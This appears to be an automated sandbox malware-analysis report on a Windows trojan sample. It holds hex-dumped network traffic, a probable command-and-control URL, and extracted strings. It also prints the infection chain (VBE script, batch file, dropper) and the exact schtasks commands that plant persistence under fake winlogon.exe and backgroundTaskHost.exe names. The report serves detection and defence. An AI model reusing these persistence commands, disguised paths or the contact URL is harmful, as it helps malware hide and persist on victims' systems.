73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 31 Aug 2024 07:22:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023624.xsph.ru
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023624.xsph.ru/
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000014.00000002.1867548337.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
            Source: blockfont.exe, 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru/auth/login
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://index.from.sh/pages/game.html

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00D6718C
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Windows\RemotePackages\RemoteApps\8057c8f30c1a8eJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6857B0_2_00D6857B
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D770BF0_2_00D770BF
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6407E0_2_00D6407E
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D8D00E0_2_00D8D00E
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D911940_2_00D91194
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D802F60_2_00D802F6
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D632810_2_00D63281
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6E2A00_2_00D6E2A0
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D766460_2_00D76646
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D737C10_2_00D737C1
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D627E80_2_00D627E8
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D8070E0_2_00D8070E
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D8473A0_2_00D8473A
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6E8A00_2_00D6E8A0
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D849690_2_00D84969
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6F9680_2_00D6F968
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D76A7B0_2_00D76A7B
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D73A3C0_2_00D73A3C
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D80B430_2_00D80B43
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D8CB600_2_00D8CB60
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D75C770_2_00D75C77
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7FDFA0_2_00D7FDFA
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D73D6D0_2_00D73D6D
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6ED140_2_00D6ED14
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6DE6C0_2_00D6DE6C
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6BE130_2_00D6BE13
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D80F780_2_00D80F78
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D65F3C0_2_00D65F3C
            Source: C:\serversessionmonitor\blockfont.exeCode function: 4_2_00007FFD9B8E35854_2_00007FFD9B8E3585
            Source: C:\serversessionmonitor\blockfont.exeCode function: 4_2_00007FFD9B8EA1554_2_00007FFD9B8EA155
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeCode function: 20_2_00007FFD9B8D358520_2_00007FFD9B8D3585
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeCode function: 20_2_00007FFD9B8DA15520_2_00007FFD9B8DA155
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B8F33E022_2_00007FFD9B8F33E0
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B8FD21822_2_00007FFD9B8FD218
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B8FD15822_2_00007FFD9B8FD158
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B9028A022_2_00007FFD9B9028A0
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B903C6D22_2_00007FFD9B903C6D
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B8FB30022_2_00007FFD9B8FB300
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B8FB1A822_2_00007FFD9B8FB1A8
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeCode function: 22_2_00007FFD9B8FA15522_2_00007FFD9B8FA155
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeCode function: 37_2_00007FFD9B8E358537_2_00007FFD9B8E3585
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeCode function: 37_2_00007FFD9B8EA15537_2_00007FFD9B8EA155
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: String function: 00D7E360 appears 52 times
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: String function: 00D7ED00 appears 31 times
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: String function: 00D7E28C appears 35 times
            Source: blockfont.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: qwhJcOiWbbUoQMvwnJNr.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: backgroundTaskHost.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1629891261.0000000006B8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1631592664.0000000005624000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1631221587.0000000005622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, pEliLlAg9VImohRyaFR.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, pEliLlAg9VImohRyaFR.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RjptLIiSqcughaqdf1L.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RjptLIiSqcughaqdf1L.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, pEliLlAg9VImohRyaFR.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, pEliLlAg9VImohRyaFR.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RjptLIiSqcughaqdf1L.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RjptLIiSqcughaqdf1L.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RiBMyj0Ypa1aKVey8Er.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RiBMyj0Ypa1aKVey8Er.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RiBMyj0Ypa1aKVey8Er.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RiBMyj0Ypa1aKVey8Er.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@38/21@1/1
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D66EC9 GetLastError,FormatMessageW,0_2_00D66EC9
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D79E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00D79E1C
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Program Files (x86)\windows portable devices\winlogon.exeJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\blockfont.exe.logJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\7cebdd664cb9e6472b16d991171ee8e76033ae4b
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCommand line argument: sfxname0_2_00D7D5D4
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCommand line argument: sfxstime0_2_00D7D5D4
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCommand line argument: STARTDLG0_2_00D7D5D4
            Source: 5P9EdUgv5r.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5P9EdUgv5r.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 5P9EdUgv5r.exeReversingLabs: Detection: 71%
            Source: 5P9EdUgv5r.exeVirustotal: Detection: 61%
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeFile read: C:\Users\user\Desktop\5P9EdUgv5r.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\5P9EdUgv5r.exe "C:\Users\user\Desktop\5P9EdUgv5r.exe"
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\serversessionmonitor\blockfont.exe "C:\serversessionmonitor\blockfont.exe"
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 9 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
